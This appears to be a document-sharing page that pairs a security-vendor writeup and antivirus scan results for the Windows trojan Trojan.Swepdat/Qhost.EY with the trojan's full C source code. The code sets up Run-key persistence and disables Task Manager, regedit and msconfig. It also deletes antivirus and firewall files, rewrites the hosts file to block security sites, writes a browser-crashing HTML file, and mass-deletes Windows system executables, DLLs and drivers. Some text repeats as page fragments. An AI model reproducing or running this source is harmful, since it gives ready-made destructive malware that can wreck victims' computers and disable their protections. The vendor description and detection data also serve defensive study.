Source - Trojan - Win32.qhost - Ey

Trojan.
Swepdat
Risk Level 1: Very Low
Printer Friendly Page
SUMMARY
TECHNICAL DETAILS
REMOVAL
Discovered: December 15, 2005

Updated: February 13, 2007 12:50:03 PM
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows
Server 2003, Windows XP
When Trojan.Swepdat is executed, it performs the following actions:
1. Copies itself as %System%\WUpdates.exe.
Note: %System% is a variable that refers to the System folder. By default this is C:\Windows\System
(Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows
XP).
2. Adds the value:

"WUpdates" = "%System%\WUpdates.exe"
to the registry subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
so that it runs every time Windows starts.
3. Attempts to rename the following files:
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe to
C:\WINDOWS\pchealth\helpctr\binaries\msconfig.ex_
C:\WINDOWS\regedit.exe to C:\WINDOWS\regedit.ex_
C:\WINDOWS\system32\Restorerstrui\rstrui.exe to
C:\WINDOWS\system32\Restorerstrui\rstrui.ex_
C:\WINDOWS\system32\wscui.cpl to C:\WINDOWS\system32\wscui.cp_
C:\WINDOWS\system32\wupdmgr.exe to C:\WINDOWS\system32\wupdagr.ex_
C:\WINDOWS\system32\taskmgr.exe to C:\WINDOWS\system32\taskdae.ex_
4. Attempts to delete the following security-related files from the specific program folder and all
subfolders:
C:\Program Files\McAfee.com\Personal Firewall\*.dll

C:\Program Files\McAfee.com\Personal Firewall\data\*.*
C:\Program Files\McAfee.com\Personal Firewall\help\*.*
C:\Program Files\McAfee.com\VSO\*.dll
C:\Program Files\McAfee.com\VSO\*.ini
C:\Program Files\McAfee.com\VSO\Res00\*.dll
http://www.symantec.com/security_response/writeup.jsp?docid=2005-121515-5145-99&tabid=2
C:\Program Files\McAfee.com\VSO\Dat\4615\*.*
C:\Program Files\McAfee.com\*.*
C:\Program Files\Norton AntiVirus\*.dll
C:\Program Files\Common Files\Symantec Shared\*.exe
C:\Program Files\Norton AntiVirus\*.ini
C:\Program Files\Norton AntiVirus\*.exe
C:\Program Files\Norton AntiVirus\*.inf
C:\Program Files\Zone Labs\ZoneAlarm\*.exe
C:\Program Files\Zone Labs\ZoneAlarm\*.zap
C:\Program Files\Zone Labs\ZoneAlarm\*.dll
C:\Program Files\Zone Labs\ZoneAlarm\repair\*.dll
C:\Program Files\Kaspersky Lab\AVP6\*.exe
C:\Program Files\Kaspersky Lab\AVP6\*.dll
5. Adds the following lines to the hosts file to block access to specific Web sites:
0.0.0.0 google.com
0.0.0.0 www.hotmail.com
0.0.0.0 www.microsoft.com
0.0.0.0 microsoft.com
0.0.0.0 macafee.com
0.0.0.0 www.macafee.com
0.0.0.0 download.mcafee.com
0.0.0.0 www.download.mcafee.com
0.0.0.0 rads.mcafee.com
0.0.0.0 us.mcafee.com
0.0.0.0 www.networkassociates.com
0.0.0.0 networkassociates.com
0.0.0.0 update.symantec.com
0.0.0.0 updates.symantec.com
0.0.0.0 iveupdate.symantec.com
0.0.0.0 norton.com
0.0.0.0 www.symantec.com
0.0.0.0 symantec.com
0.0.0.0 www.norton.com
0.0.0.0 google.com
0.0.0.0 bitdefender.com
0.0.0.0 www.viruslist.com
0.0.0.0 viruslist.com
0.0.0.0 www.virustotal.com
0.0.0.0 virustotal.com
0.0.0.0 www.kaspersky.com
0.0.0.0 kaspersky.com
0.0.0.0 kaspersky-labs.com
0.0.0.0 www.kaspersky-labs.com
0.0.0.0 www.trendmicro.com
0.0.0.0 trendmicro.com
0.0.0.0 www.pandasoftware.com
0.0.0.0 pandasoftware.com
0.0.0.0 www.nod32.com
0.0.0.0 nod32.com
0.0.0.0 yahoo.com
0.0.0.0 mail.yahoo.com
0.0.0.0 www.grisoft.com
0.0.0.0 www.f-secure.com
0.0.0.0 f-secure.com
6. Closes windows with the following window titles:
Windows Task Manager

Registry Editor
System Configuration Utility
Windows File Protection
7. Displays a message with the following properties:
Title: Error
Message: Access Violation at address: 0050666F
8. Creates the file C:\windows\system32\exploit.html which is a malicious HTML file that causes a Denial
of Service if opened.
9. Attempts to delete the following files from the following folders:
C:\WINDOWS and all subfolders:

*.exe
*.dll
C:\WINDOWS\System and all subfolders:

*.exe
*.dll
C:\WINDOWS\System32 and all subfolders:

*.exe
*.dll
C:\WINDOWS\System32\Restore, if present, and all subfolders:

*.*
C:\WINDOWS\System32\DRIVERS, if present, and all subfolders:

*.sys
10. Creates the file C:\NError.dmp, which is a harmless text file.
File 74014b1000255b1f306e0088a10738001789c1d3.EXE received on 2009.05.23 13:15:04 (UTC)
Antivirus Version Last Update Result
AhnLab-V3 5.0.0.2 2009.05.23 -
AntiVir 7.9.0.168 2009.05.23 TR/Qhost.EY
Antiy-AVL 2.0.3.1 2009.05.22 Trojan/Win32.Qhost
Authentium 5.1.2.4 2009.05.22 W32/Heuristic-119!Eldorado
Avast 4.8.1335.0 2009.05.22 Win32:KillWin-S
AVG 8.5.0.339 2009.05.23 Generic.MAY
BitDefender 7.2 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0
CAT-QuickHeal 10.00 2009.05.23 Trojan.Qhost.ey
ClamAV 0.94.1 2009.05.22 Trojan.Rorren
Comodo 1157 2009.05.08 TrojWare.Win32.Qhosts.EY
DrWeb 5.0.0.12182 2009.05.23 Trojan.KillFiles.472
eSafe 7.0.17.0 2009.05.21 Win32.Qhost.ey
eTrust-Vet 31.6.6519 2009.05.23 -
F-Prot 4.4.4.56 2009.05.22 W32/Heuristic-119!Eldorado
F-Secure 8.0.14470.0 2009.05.23 Trojan.Win32.Qhost.ey
Fortinet 3.117.0.0 2009.05.23 W32/Qhost.EY!tr
GData 19 2009.05.23 Generic.Malware.SA!Q!w.2C8E19D0
Ikarus T3.1.1.49.0 2009.05.23 Trojan.Win32.Qhost
K7AntiVirus 7.10.741 2009.05.21 Trojan.Win32.Qhost.ey
Kaspersky 7.0.0.125 2009.05.23 Trojan.Win32.Qhost.ey
McAfee 5623 2009.05.22 Zap-337
McAfee+Artemis 5623 2009.05.22 Zap-337
McAfee-GW-Edition 6.7.6 2009.05.23 Trojan.Qhost.EY
Microsoft 1.4701 2009.05.23 TrojanDropper:Win32/Logsnif
NOD32 4098 2009.05.22 Win32/Qhosts.EY
Norman 2009.05.22 W32/Qhost.BZ
nProtect 2009.1.8.0 2009.05.23 Trojan/W32.Qhost.12288.D
PCTools 4.4.2.0 2009.05.21 Trojan.Qhosts
Prevx 3.0 2009.05.23 -
Rising 21.30.52.00 2009.05.23 Trojan.Qhost.eq
Sophos 4.42.0 2009.05.23 Troj/Killfile-F
Sunbelt 3.2.1858.2 2009.05.23 Trojan.Swepdat
Symantec 1.4.4.12 2009.05.23 Trojan.Swepdat
TheHacker 6.3.4.3.331 2009.05.22 Trojan/Qhost.ey
TrendMicro 8.950.0.1092 2009.05.23 -
VBA32 3.12.10.5 2009.05.23 Trojan.Win32.Qhost.ey
ViRobot 2009.5.23.1749 2009.05.23 -
VirusBuster 4.6.5.0 2009.05.22 Trojan.Qhost.RW
Additional information
File size: 12288 bytes
MD5 : 35b259a4d83e4d59be351c396fd6b95a
SHA1 : e20d0a5f2600162b76a2c89e3a101ce7240fcff8
SHA256: 631cb88ed8edacc15ff90dea81ff661adc628d17919e6c138f6c867d5c46035b
W32.MaTriX@mm.cpp
/*
*closes Windows Task Manager

*closes Registry Editor
*closes System Configuration Utility
*closes Windows File Protection
*BlockSite
*Deleting Windows
*infected msconfig.exe
*infected rstrui.exe
*infected wscui.cpl
*infected wupdmgr.exe
*infected taskmgr.exe
*kill files AV&FW
made by ceoby
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <mmsystem.h>
void hideprocess()
{
int i;
for(i = 1; i < 25; i++)
{
HWND program;
Sleep (100);
program = FindWindow(0, "Windows Task Manager");
SendMessage(program,WM_CLOSE,(LPARAM)0,(WPARAM)0);
program = FindWindow(0, "Registry Editor");
program = FindWindow(0, "System Configuration Utility");
program = FindWindow(0, "Windows File Protection");
MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );

}
}
char Wn[MAX_PATH];
char Mn[MAX_PATH];
SOCKET sock;
HWND Wnd;
char Buffer [1230];
int x,y;
int Hkey()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\WUpdates.exe");
CopyFile(pathtofile,system,FALSE);
HKEY hKey;
W32.MaTriX@mm.cpp
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "WUpdates",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
}
void fPaths()
{
GetSystemDirectory(Wn, sizeof(Wn));
GetModuleFileName(0, Mn, sizeof(Mn));
strcat(Wn, "\\WUpdates.exe");
}
void inst()
{
CopyFile(Mn,Wn,0);
CopyFile ("WUpdates.exe", "C:\\windows",TRUE);
CopyFile ("MicroSuck.exe", "C:\\windows\\system",TRUE);
CopyFile ("Svchost32.exe", "C:\\windows\\system32",TRUE);
HKEY inst;
RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &inst);
RegSetValueEx(inst, "Windows Security Updates", 0, REG_SZ, (LPBYTE)Wn, sizeof(Wn));
RegCloseKey(inst);
}
void BlockSite()
{
FILE *fpl;
fpl = fopen ("C:\\WINDOWS\\System32\\drivers\\etc\\hosts","w");
fprintf (fpl,"0.0.0.0 google.com");
fprintf (fpl," 0.0.0.0 www.hotmail.com");
fprintf (fpl," 0.0.0.0 www.microsoft.com");
fprintf (fpl," 0.0.0.0 microsoft.com");
fprintf (fpl," 0.0.0.0 macafee.com");
fprintf (fpl," 0.0.0.0 www.macafee.com");
fprintf (fpl," 0.0.0.0 download.mcafee.com");
fprintf (fpl," 0.0.0.0 www.download.mcafee.com");
fprintf (fpl," 0.0.0.0 rads.mcafee.com");
fprintf (fpl," 0.0.0.0 us.mcafee.com");
fprintf (fpl," 0.0.0.0 www.networkassociates.com");
fprintf (fpl," 0.0.0.0 networkassociates.com");
fprintf (fpl," 0.0.0.0 update.symantec.com");
fprintf (fpl," 0.0.0.0 updates.symantec.com");
fprintf (fpl," 0.0.0.0 iveupdate.symantec.com");
fprintf (fpl," 0.0.0.0 norton.com");
fprintf (fpl," 0.0.0.0 www.symantec.com");
fprintf (fpl," 0.0.0.0 symantec.com");
fprintf (fpl," 0.0.0.0 www.norton.com");
fprintf (fpl," 0.0.0.0 google.com");
fprintf (fpl," 0.0.0.0 bitdefender.com");
fprintf (fpl," 0.0.0.0 www.viruslist.com");
fprintf (fpl," 0.0.0.0 viruslist.com");
fprintf (fpl," 0.0.0.0 www.virustotal.com");
fprintf (fpl," 0.0.0.0 virustotal.com");
fprintf (fpl," 0.0.0.0 www.kaspersky.com");
fprintf (fpl," 0.0.0.0 kaspersky.com");
fprintf (fpl," 0.0.0.0 kaspersky-labs.com");
fprintf (fpl," 0.0.0.0 www.kaspersky-labs.com");
W32.MaTriX@mm.cpp
fprintf (fpl," 0.0.0.0 www.trendmicro.com");

fprintf (fpl," 0.0.0.0 trendmicro.com");
fprintf (fpl," 0.0.0.0 www.pandasoftware.com");
fprintf (fpl," 0.0.0.0 pandasoftware.com");
fprintf (fpl," 0.0.0.0 www.nod32.com");
fprintf (fpl," 0.0.0.0 nod32.com");
fprintf (fpl," 0.0.0.0 yahoo.com");
fprintf (fpl," 0.0.0.0 mail.yahoo.com");
fprintf (fpl," 0.0.0.0 www.grisoft.com");
fprintf (fpl," 0.0.0.0 www.f-secure.com");
fprintf (fpl," 0.0.0.0 f-secure.com");
fclose(fpl);
}
void DelWin()
{
system("del C:\\WINDOWS\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\System\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System32\\*.exe /F /S /Q");
system("del C:\\WINDOWS\\System32\\*.dll /F /S /Q");
system("del C:\\WINDOWS\\System32\\Restore\\*.* /F /S /Q");
system("del C:\\WINDOWS\\System32\\DRIVERS\\*.sys /F /S /Q");
}
void spaceup()
{
char i;
FILE *Uknown;
Uknown = fopen ("C:\\WINDOWS\\System32\\WUpdates.txt","w");
for (i=1;i<100;i++);
{
Sleep (100);
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x00C0000,Bx0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x00000F0,0x0000000,7x0000000,0x00FF000,Ax0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax0000000,0x0000000,0x000E000,0x0000000");
fprintf(Uknown,"0x0000000,0D0000000,Bx0000000,0x0000000,0x0000000,0x0000000");
Sleep (100);
fprintf(Uknown,"0x0000000,0x0000000,Nx0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"Ax0000000,0x0000000,Ax0000000,0x0000000,0x0000000,0x0000000");
fprintf(Uknown,"0x0000000,0x0000000,Ax000F000,0x00CCC00,0x0000C00,0xFFF0000");
Sleep (100);
}
}
void Exploit()
{
FILE *ghp;
ghp = fopen ("C:\\windows\\system32\\exploit.html","w");
fprintf(ghp, "<html>");
W32.MaTriX@mm.cpp
fprintf(ghp, "<script>");
fprintf(ghp, "window.onerror=new Function(history.go(0));");
fprintf(ghp, "function btf(){btf();}");
fprintf(ghp, "btf();");
fprintf(ghp, "</script>");
fprintf(ghp, "</html>");
}
void Anticlean()
{
int i;
for(i = 1; i < 9999999; i++)
rename("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.exe",
"C:\\WINDOWS\\pchealth\\helpctr\\binaries\\msconfig.ex_");
Sleep (100);
rename("C:\\WINDOWS\\regedit.exe","C:\\WINDOWS\\regedit.ex_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.exe",
"C:\\WINDOWS\\system32\\Restorerstrui\\rstrui.ex_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\wscui.cpl","C:\\WINDOWS\\system32\\wscui.cp_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\wupdmgr.exe","C:\\WINDOWS\\system32\\wupdagr.ex_");
Sleep (100);
rename("C:\\WINDOWS\\system32\\taskmgr.exe","C:\\WINDOWS\\system32\\taskdae.ex_");
Sleep (100);
MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );
}
void killavfw()
{
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\data\\*.* /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\Personal Firewall\\help\\*.* /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\*.ini /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\Res00\\*.dll /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\VSO\\Dat\\4615\\*.* /F /S /Q ");
system("del C:\\Program Files\\McAfee.com\\*.* /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Common Files\\Symantec Shared\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.ini /F /S /Q");
system("del C:\\Program Files\\Norton AntiVirus\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Norton AntiVirus\\*.inf /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.zap /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Zone Labs\\ZoneAlarm\\repair\\*.dll /F /S /Q ");
system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.exe /F /S /Q ");
system("del C:\\Program Files\\Kaspersky Lab\\AVP6\\*.dll /F /S /Q ");
}
int main(int argc, char *argv[])

{
HWND wndstealth;
AllocConsole();
W32.MaTriX@mm.cpp
wndstealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(wndstealth,0);
Hkey();
Anticlean();
killavfw();
BlockSite();
hideprocess();
Exploit();
DelWin();
FILE *fp;
fp = fopen ("c:\\NError.dmp","w");
{
fprintf(fp,"%s","Stop: 0x0000000A (0xFFFFFFFC,0x00000002,0x00000000,0x804DC42A)");
fclose(fp);
}
}

Source - Trojan - Win32.qhost - Ey

Transféré par

Informations du document

Description originale:

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Source - Trojan - Win32.qhost - Ey

Transféré par

Droits d'auteur :

Formats disponibles

Trojan.

Discovered: December 15, 2005

When Trojan.Swepdat is executed, it performs the following actions:

1. Copies itself as %System%\WUpdates.exe.

2. Adds the value:

to the registry subkey:

so that it runs every time Windows starts.

3. Attempts to rename the following files:

C:\Program Files\McAfee.com\Personal Firewall\*.dll

6. Closes windows with the following window titles:

Windows Task Manager

7. Displays a message with the following properties:

9. Attempts to delete the following files from the following folders:

C:\WINDOWS and all subfolders:

C:\WINDOWS\System and all subfolders:

C:\WINDOWS\System32 and all subfolders:

C:\WINDOWS\System32\Restore, if present, and all subfolders:

C:\WINDOWS\System32\DRIVERS, if present, and all subfolders:

10. Creates the file C:\NError.dmp, which is a harmless text file.

*closes Windows Task Manager

MessageBox(NULL, "Access Violation at address: 0050666F","Error", MB_OK | MB_ICONERROR );

fprintf (fpl," 0.0.0.0 www.trendmicro.com");

int main(int argc, char *argv[])

Vous aimerez peut-être aussi